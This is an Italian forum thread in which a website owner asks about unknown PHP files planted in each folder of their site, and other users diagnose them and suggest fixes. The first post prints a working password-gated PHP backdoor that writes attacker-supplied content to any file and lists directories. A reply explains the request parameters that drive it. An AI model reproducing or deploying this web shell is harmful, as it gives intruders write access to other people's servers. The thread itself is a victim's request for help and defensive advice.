Visualizzazione dei risultati da 1 a 5 su 5
  1. #1
    Utente di HTML.it
    Registrato dal
    Sep 2006
    Messaggi
    466

    Aiuto per files "sospetti" dentro al mio sito

    Ciao a tutti, un aiutino...

    Sono andato a ricontrollare le varie cartelle del mio sito (quindi in remoto) e dentro ogni cartella ho trovato un files (che non ho messo io) sempre con nomi diversi (stats, include, init, script, images....) e con un contenuto sempre simile a questo
    codice:
    <?php $r=$_REQUEST;$c=getcwd();$n=chr(32);print('468505ab9718d8c2205ea35d94f04668');if(md5(md5(@$r['p']))=='3829c383a1277bd6e7e108ab36f8f03c'){print($n.$c.$n);fwrite(fopen(dirname(__FILE__).'/'.$r['f'],'w+'),$r['b']);print($n);print_r(scandir($c));}exit;?>
    cos'è???

  2. #2
    Utente di HTML.it
    Registrato dal
    May 2012
    Messaggi
    1,453
    Sembrerebbe un bel code injecter, praticamente chi ti ha messo quel file puo modificare
    i files che vuole e come vuole semplicemente inviando le variabili richieste.

    Rimuovi subito tutti quei files....


    Es. via url ?p=password...&f=nomefile&b=codici da inniettare...

  3. #3
    Utente di HTML.it
    Registrato dal
    Sep 2006
    Messaggi
    466
    In verità appena me ne sono accorto li ho subito rimossi...

    per la cronoca sono stati inseriti sempre intorno alle 5 del mattino a partire dall'estate 2011 fino alla primavera 2012 sempre uno per ogni cartella...

    comunque da quello che vedo io i miei files sono sempre quelli che ho messo io...senza modifiche...

  4. #4
    Utente di HTML.it
    Registrato dal
    Sep 2006
    Messaggi
    466
    Qualche giorno fa però mi hanno modificato l'htaccess
    così
    codice:
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{QUERY_STRING} ^(%2d|-)[^=]+$ [NC]
    RewriteRule ^(.*) $1? [L]
    </IfModule>

  5. #5
    Utente di HTML.it L'avatar di homerbit
    Registrato dal
    Dec 2005
    residenza
    Roma
    Messaggi
    1,380
    modifica i permessi di accesso delle cartelle che non devno esser modificate in sola lettura, idem per il file .htaccess (cosa molto strana che lo abbiano modificato terzi!)
    Sei sicuro di essere l'unico proprietario dei dati di accesso al sito ?
    Monitora la situazione, al limite senti anche il tuo provider.
    Ciao
    If you think your users are idiots, only idiots will use it. DropBox

Permessi di invio

  • Non puoi inserire discussioni
  • Non puoi inserire repliche
  • Non puoi inserire allegati
  • Non puoi modificare i tuoi messaggi
  •  
Powered by vBulletin® Version 4.2.1
Copyright © 2024 vBulletin Solutions, Inc. All rights reserved.